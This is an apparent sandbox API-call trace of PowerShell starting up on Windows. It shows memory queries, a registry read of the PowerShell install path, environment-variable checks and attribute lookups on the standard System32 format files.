	[0092.098] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.099] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.099] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.102] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.162] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.162] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.162] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.162] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.163] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.163] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.164] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.164] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.172] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.180] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.180] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.181] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.181] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.182] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.183] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.183] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.183] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.185] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.185] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.185] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.186] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.186] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.191] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.196] VirtualQuery (in: lpAddress=0x16c440, lpBuffer=0x16d300, dwLength=0x30 | out: lpBuffer=0x16d300*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.196] VirtualQuery (in: lpAddress=0x16c440, lpBuffer=0x16d300, dwLength=0x30 | out: lpBuffer=0x16d300*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.196] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.247] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.287] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.288] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.288] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.328] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0092.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.328] CoTaskMemFree (pv=0x3080c0) 
	[0092.339] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.345] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.346] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.346] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.347] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.347] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.347] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.349] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.350] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8e8 | out: phkResult=0x16d8e8*=0x338) returned 0x0
	[0092.351] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d8fc, lpData=0x0, lpcbData=0x16d8f8*=0x0 | out: lpType=0x16d8fc*=0x1, lpData=0x0, lpcbData=0x16d8f8*=0x74) returned 0x0
	[0092.351] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d86c, lpData=0x0, lpcbData=0x16d868*=0x0 | out: lpType=0x16d86c*=0x1, lpData=0x0, lpcbData=0x16d868*=0x74) returned 0x0
	[0092.351] CoTaskMemAlloc (cb=0x78) returned 0x28d9f0
	[0092.351] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d83c, lpData=0x28d9f0, lpcbData=0x16d838*=0x74 | out: lpType=0x16d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d838*=0x74) returned 0x0
	[0092.351] CoTaskMemFree (pv=0x28d9f0) 
	[0092.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0092.352] SetErrorMode (uMode=0x1) returned 0x1
	[0092.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0092.352] SetErrorMode (uMode=0x1) returned 0x1
	[0092.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.352] SetErrorMode (uMode=0x1) returned 0x1
	[0092.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0092.353] SetErrorMode (uMode=0x1) returned 0x1
	[0092.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.353] SetErrorMode (uMode=0x1) returned 0x1
	[0092.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0092.353] SetErrorMode (uMode=0x1) returned 0x1
	[0092.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.354] SetErrorMode (uMode=0x1) returned 0x1
	[0092.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0092.354] SetErrorMode (uMode=0x1) returned 0x1
	[0092.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.354] SetErrorMode (uMode=0x1) returned 0x1
	[0092.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0092.354] SetErrorMode (uMode=0x1) returned 0x1
	[0092.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0092.355] SetErrorMode (uMode=0x1) returned 0x1
	[0092.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0092.355] SetErrorMode (uMode=0x1) returned 0x1
	[0092.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0092.355] SetErrorMode (uMode=0x1) returned 0x1
	[0092.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0092.355] SetErrorMode (uMode=0x1) returned 0x1
	[0092.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0092.355] SetErrorMode (uMode=0x1) returned 0x1
	[0092.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0092.356] SetErrorMode (uMode=0x1) returned 0x1
	[0092.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0092.356] SetErrorMode (uMode=0x1) returned 0x1
	[0092.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0092.356] SetErrorMode (uMode=0x1) returned 0x1
	[0092.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0092.356] SetErrorMode (uMode=0x1) returned 0x1
	[0092.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0092.357] SetErrorMode (uMode=0x1) returned 0x1
	[0092.357] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0092.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.357] CoTaskMemFree (pv=0x3080c0) 
	[0092.362] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0092.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.362] CoTaskMemFree (pv=0x3080c0) 
	[0092.363] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0092.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.363] CoTaskMemFree (pv=0x3080c0) 
	[0092.364] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0092.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.364] CoTaskMemFree (pv=0x3080c0) 
